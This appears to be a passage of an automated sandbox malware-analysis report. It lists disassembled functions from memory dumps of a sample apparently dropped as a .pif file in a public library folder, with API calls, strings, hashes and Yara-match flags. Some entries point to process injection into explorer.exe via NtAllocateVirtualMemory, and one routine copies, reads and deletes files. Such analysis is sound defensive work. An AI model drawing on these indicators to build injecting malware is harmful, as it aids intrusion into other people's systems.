                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Data$qvDebugger$@__lock@__unlock
                                                                                                                                                                                          • String ID: !"bogus context in _ExceptionHandler()"$XX.CPP$bogus context in _ExceptionHandler()
                                                                                                                                                                                          • API String ID: 2914929783-349939845
                                                                                                                                                                                          • Opcode ID: c392f7f339af2bf3e46a4916eb2e5e7a57c82609a3993434a378f8b6525d0d29
                                                                                                                                                                                          • Instruction ID: c317ca9096495a95f9ed2eb60a2a61d46a7a471c31c3f754d609f31b13d36163
                                                                                                                                                                                          • Opcode Fuzzy Hash: c392f7f339af2bf3e46a4916eb2e5e7a57c82609a3993434a378f8b6525d0d29
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55D12CB4A00209DFCB14DF99C885AADBBB5FF48304F1481BAE9057B3A1C7799E81DB54
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005A1C43 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 005A1C50
                                                                                                                                                                                          • int.LIBCPMT ref: 005A1C63
                                                                                                                                                                                            • Part of subcall function 0059EEA3: std::_Lockit::_Lockit.LIBCPMT ref: 0059EEB4
                                                                                                                                                                                            • Part of subcall function 0059EEA3: std::_Lockit::~_Lockit.LIBCPMT ref: 0059EECE
                                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 005A1CA3
                                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 005A1CAC
                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 005A1CCA
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 005A1D0B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                                          • String ID: ,kG$0kG$@!G
                                                                                                                                                                                          • API String ID: 3815856325-312998898
                                                                                                                                                                                          • Opcode ID: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                                                                                                                          • Instruction ID: ce7c1cd3a4d55f435f0ca7694a648ffc628c8ea5bf4cfcbc72b7086eeea73091
                                                                                                                                                                                          • Opcode Fuzzy Hash: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9D2107319009159FCB14FBA8D94AE9D7FA9FF86720F21016AF404E72D1DB35AE41C798
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004038B6 Relevance: 15.2, Strings: 12, Instructions: 218COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: IS_STRUC(blType->tpMask)$IS_STRUC(blType->tpMask)$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$XX.CPP$dtorCnt < varCount$memType$memType->tpClass.tpcFlags & CF_HAS_DTOR$varType->tpClass.tpcFlags & CF_HAS_DTOR
                                                                                                                                                                                          • API String ID: 0-1006393815
                                                                                                                                                                                          • Opcode ID: 0d642b40e8ec20ac1549495b7ae4ccacb88e5f7043fc7750c95bec1c055ba6ea
                                                                                                                                                                                          • Instruction ID: a813c007022810ed9c0a106b08cb99bfc9bf50251e45d0976e4052c3e0ccd181
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0d642b40e8ec20ac1549495b7ae4ccacb88e5f7043fc7750c95bec1c055ba6ea
                                                                                                                                                                                          • Instruction Fuzzy Hash: B781C472A00208ABDF119F91CC46FAE7FB5BF04705F14806AFD54362D1D3BA9A60DB89
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00404659 Relevance: 15.2, Strings: 12, Instructions: 197COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • __isSameTypeID(srcTypPtr, tgtTypPtr) == 0, xrefs: 00404705
                                                                                                                                                                                          • tgtTypPtr != 0 && __isSameTypeID(topTypPtr, tgtTypPtr) == 0, xrefs: 0040474D
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404833
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404748
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404700
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 004046D1
                                                                                                                                                                                          • topTypPtr != 0 && IS_STRUC(topTypPtr->tpMask), xrefs: 0040468A
                                                                                                                                                                                          • srcTypPtr == 0 || IS_STRUC(srcTypPtr->tpMask), xrefs: 004046D6
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 00404685
                                                                                                                                                                                          • tgtTypPtr != 0 && IS_STRUC(tgtTypPtr->tpMask), xrefs: 004046B0
                                                                                                                                                                                          • XXTYPE.CPP, xrefs: 004046AB
                                                                                                                                                                                          • srcTypPtr, xrefs: 00404838
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$XXTYPE.CPP$__isSameTypeID(srcTypPtr, tgtTypPtr) == 0$srcTypPtr$srcTypPtr == 0 || IS_STRUC(srcTypPtr->tpMask)$tgtTypPtr != 0 && IS_STRUC(tgtTypPtr->tpMask)$tgtTypPtr != 0 && __isSameTypeID(topTypPtr, tgtTypPtr) == 0$topTypPtr != 0 && IS_STRUC(topTypPtr->tpMask)
                                                                                                                                                                                          • API String ID: 0-2396967825
                                                                                                                                                                                          • Opcode ID: d7648ce6212e0e930c1cc39aa32bab138302b09c43c6609dbc5e6efde8939b29
                                                                                                                                                                                          • Instruction ID: 5efc0c11aba9b44eb1f17c95100801df8ae742c1086434eea204630fcc019830
                                                                                                                                                                                          • Opcode Fuzzy Hash: d7648ce6212e0e930c1cc39aa32bab138302b09c43c6609dbc5e6efde8939b29
                                                                                                                                                                                          • Instruction Fuzzy Hash: 3171C3B1900209ABDF14DE51CC05BAE77A0AF85714F18C83AFE04362D1E37DD960CB9A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 146459D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 146459EA
                                                                                                                                                                                            • Part of subcall function 1464571E: HeapFree.KERNEL32(00000000,00000000,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?), ref: 14645734
                                                                                                                                                                                            • Part of subcall function 1464571E: GetLastError.KERNEL32(?,?,1464924F,?,00000000,?,00000000,?,14649276,?,00000007,?,?,14647E5A,?,?), ref: 14645746
                                                                                                                                                                                          • _free.LIBCMT ref: 146459F6
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A01
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A0C
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A17
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A22
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A2D
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A38
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A43
                                                                                                                                                                                          • _free.LIBCMT ref: 14645A51
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 8ac2d5dd06e36378d5b92045dbadc96f3a9d6212446015558d2e8fbc73201920
                                                                                                                                                                                          • Instruction ID: bd5d784e7d600cd237e32240a1878eab085a2cfc2f89391d0122f83ac822fb98
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ac2d5dd06e36378d5b92045dbadc96f3a9d6212446015558d2e8fbc73201920
                                                                                                                                                                                          • Instruction Fuzzy Hash: F811B67E521148FFDF12DF94C851CDD3FA5EF14254B6940A1BE088FA21DA31EA509B88
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005D8F03 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 269201875-0
                                                                                                                                                                                          • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                                                                                          • Instruction ID: 308c53ad1c5e73ca6c646b3dbd44d380b3cbbba384f78a6a592c14978dcd2068
                                                                                                                                                                                          • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                                                                                                                          • Instruction Fuzzy Hash: A5118376504249EFCB11EF58D846E9D3F65FF48750F4180A2B9088B362EA31EA50DF45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 12378121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 12378135
                                                                                                                                                                                            • Part of subcall function 12376782: RtlFreeHeap.NTDLL(00000000,00000000,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?), ref: 12376798
                                                                                                                                                                                            • Part of subcall function 12376782: GetLastError.KERNEL32(?,?,12380C6F,?,00000000,?,00000000,?,12380F13,?,00000007,?,?,1238145E,?,?), ref: 123767AA
                                                                                                                                                                                          • _free.LIBCMT ref: 12378141
                                                                                                                                                                                          • _free.LIBCMT ref: 1237814C
                                                                                                                                                                                          • _free.LIBCMT ref: 12378157
                                                                                                                                                                                          • _free.LIBCMT ref: 12378162
                                                                                                                                                                                          • _free.LIBCMT ref: 1237816D
                                                                                                                                                                                          • _free.LIBCMT ref: 12378178
                                                                                                                                                                                          • _free.LIBCMT ref: 12378183
                                                                                                                                                                                          • _free.LIBCMT ref: 1237818E
                                                                                                                                                                                          • _free.LIBCMT ref: 1237819C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 05151cddc642ddb4060c39c8e7bca3567e4bb83e58adb1e4543c5c71d08d0bff
                                                                                                                                                                                          • Instruction ID: dc68d0fea0cc576aea496fa1c79adfc400cbba9c95e29850624141d54f769a65
                                                                                                                                                                                          • Opcode Fuzzy Hash: 05151cddc642ddb4060c39c8e7bca3567e4bb83e58adb1e4543c5c71d08d0bff
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C11C07E100149AFCF91DF94C850CE93BA5BF08395B0191A4BA588F220DA36EF50AFC0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0059647C Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 278COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 005964C8
                                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00596505
                                                                                                                                                                                            • Part of subcall function 005C5552: __onexit.LIBCMT ref: 005C5558
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Init_thread_footer$__onexit
                                                                                                                                                                                          • String ID: 0lG$0lG$0lG$0lG$0lG$kG
                                                                                                                                                                                          • API String ID: 1878262506-4252883706
                                                                                                                                                                                          • Opcode ID: 9fceeccbbb7e863caeab5f8b3b560d4f3a4196f7e6888d4732fdfa0b1817e938
                                                                                                                                                                                          • Instruction ID: f6284b5ce304fd04e7517805141018cab5c4313745c9e26dd1126a62d280b0cc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9fceeccbbb7e863caeab5f8b3b560d4f3a4196f7e6888d4732fdfa0b1817e938
                                                                                                                                                                                          • Instruction Fuzzy Hash: A691C371604605BFDB11BF74AD46E6E3E9EFB80300F01443EF98D961A2DF299C488B69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004065B4 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 106COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0040B868: EnterCriticalSection.KERNEL32(0041048C,?,004056B8,?,creating stream lock,?,?,?,00405450,?,?,?,?,?,00404F7B,?), ref: 0040B870
                                                                                                                                                                                            • Part of subcall function 0040B868: InitializeCriticalSection.KERNEL32(?,0041048C,?,004056B8,?,creating stream lock,?,?,?,00405450,?,?,?,?,?,00404F7B), ref: 0040B89E
                                                                                                                                                                                            • Part of subcall function 0040B868: LeaveCriticalSection.KERNEL32(0041048C,?,0041048C,?,004056B8,?,creating stream lock,?,?,?,00405450,?,?,?,?), ref: 0040B8C5
                                                                                                                                                                                          • SetHandleCount.KERNEL32(00000032), ref: 004065D2
                                                                                                                                                                                          • GetStartupInfoA.KERNEL32(?), ref: 004065FC
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F6), ref: 004066B5
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,000000F6), ref: 004066C1
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,000000F5,000000F6), ref: 004066CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Handle$CriticalSection$CountEnterInfoInitializeLeaveStartup
                                                                                                                                                                                          • String ID: D@$D@$creating global handle lock
                                                                                                                                                                                          • API String ID: 3255421519-3519871622
                                                                                                                                                                                          • Opcode ID: 822bb4a5261f8c7165ddfbd27327c476d3e5637e78d8e88fa555a43e3e4aef86
                                                                                                                                                                                          • Instruction ID: 91436c65d83507411f26f5c3f9f24484589e4f2abe2935dbc4f524b2f6f24ae6
                                                                                                                                                                                          • Opcode Fuzzy Hash: 822bb4a5261f8c7165ddfbd27327c476d3e5637e78d8e88fa555a43e3e4aef86
                                                                                                                                                                                          • Instruction Fuzzy Hash: A331E5B19002019BD714DF25DCC1B6AB7A0EB40324F254E3EEA87A72D0D77E9865CB5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 123373AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(123A2B14,00000000,123A52D8,00003000,00000004,00000000,00000001), ref: 123373DD
                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(123A2B14,00000000,00008000,?,00000000,00000001,00000000,12337656,C:\Users\Public\Libraries\wkrriuhD.pif), ref: 1233749E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3664441036.0000000012330000.00000040.00001000.00020000.00000000.sdmp, Offset: 12330000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3664441036.00000000123A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_12330000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                                          • API String ID: 2050909247-4242073005
                                                                                                                                                                                          • Opcode ID: 4401eb0e7e7426f96ee5cc72ef298f5cc5a17e02a92be0572fde898b1c536244
                                                                                                                                                                                          • Instruction ID: 951722ec450979c9b153bf9a03204c24ad873d57f9cc1295d4b3f25c7be42af5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 4401eb0e7e7426f96ee5cc72ef298f5cc5a17e02a92be0572fde898b1c536244
                                                                                                                                                                                          • Instruction Fuzzy Hash: E731A3B7691229AFE767DF64CC84FA67BACBB84312F014C28F516D6640DB34E904CB61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 005E1CDC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 65COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3646905411.0000000000590000.00000040.00000400.00020000.00000000.sdmp, Offset: 00590000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_590000_wkrriuhD.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free
                                                                                                                                                                                          • String ID: {-Y
                                                                                                                                                                                          • API String ID: 269201875-2507730204
                                                                                                                                                                                          • Opcode ID: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                          • Instruction ID: 2fee319059b7ab244e53d3b67284b5e75d420872032dacf75444ff7de35a4a86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5e629f50e4f6999c0b477f1519b6f3e41be6fc4275a29973627e91760813f884
                                                                                                                                                                                          • Instruction Fuzzy Hash: 34116D31551B49AAD630F7B1CC0BFDB7FDCBF89700F400826B2D96A252DA34A644C695
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 14641CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D1B
                                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 14641D37
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D4B
                                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D58
                                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D72
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D7D
                                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 14641D8A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3665605507.0000000014641000.00000040.00001000.00020000.00000000.sdmp, Offset: 14640000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3665584194.0000000014640000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3665605507.0000000014656000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_14640000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                                          • Opcode ID: 9869b0d0aaa9c46e106d9ffd15a8df126736e3dce1245f641c75ae9012a5b3f7
                                                                                                                                                                                          • Instruction ID: a1b08abbf9d977296a70e635b11dac367414d8a98d004cafa841defc7f987acf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9869b0d0aaa9c46e106d9ffd15a8df126736e3dce1245f641c75ae9012a5b3f7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7E214CB5E0122CAFEF209FA09CCCEEA76ACEB2864CF180569F515D3140D6709E468A70
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040847C Relevance: 12.9, Strings: 10, Instructions: 365COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: +$-$0$9$A$F$I$N$N$N
                                                                                                                                                                                          • API String ID: 0-1648577461
                                                                                                                                                                                          • Opcode ID: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
                                                                                                                                                                                          • Instruction ID: 1cb875950997489b1ee042daea32ef314182afe9941b1639f7d9611703f458e9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e8387257570eda45cc7b934ad265545eca86ec623c7b602e9144ae6f6a7cda6
                                                                                                                                                                                          • Instruction Fuzzy Hash: A6E18175D042499BCF20CFA4CA846EEBBB1AF58310F24817FD894B7391DB398A41CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00408960 Relevance: 12.9, Strings: 10, Instructions: 363COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_24_2_400000_wkrriuhD.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: +$-$0$9$A$F$I$N$N$N
                                                                                                                                                                                          • API String ID: 0-1648577461
                                                                                                                                                                                          • Opcode ID: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
                                                                                                                                                                                          • Instruction ID: fdd31973b3b99697ec39bc4d4de6dc45345fe78665f93d75c906704075768b3a
                                                                                                                                                                                          • Opcode Fuzzy Hash: f88074ef882d433715eecd647d47c0ec08558ead3a85b5924cd63f73f9c18cbf
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AE17D70E05249DBDF14DFA4C6842EEBBB1AF58300F24817BE894B7391DB395A41CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040265C Relevance: 12.6, Strings: 10, Instructions: 106COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000018.00000002.3644066664.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000018.00000002.3643966660.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644145580.000000000040D000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000018.00000002.3644413969.0000000000416000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
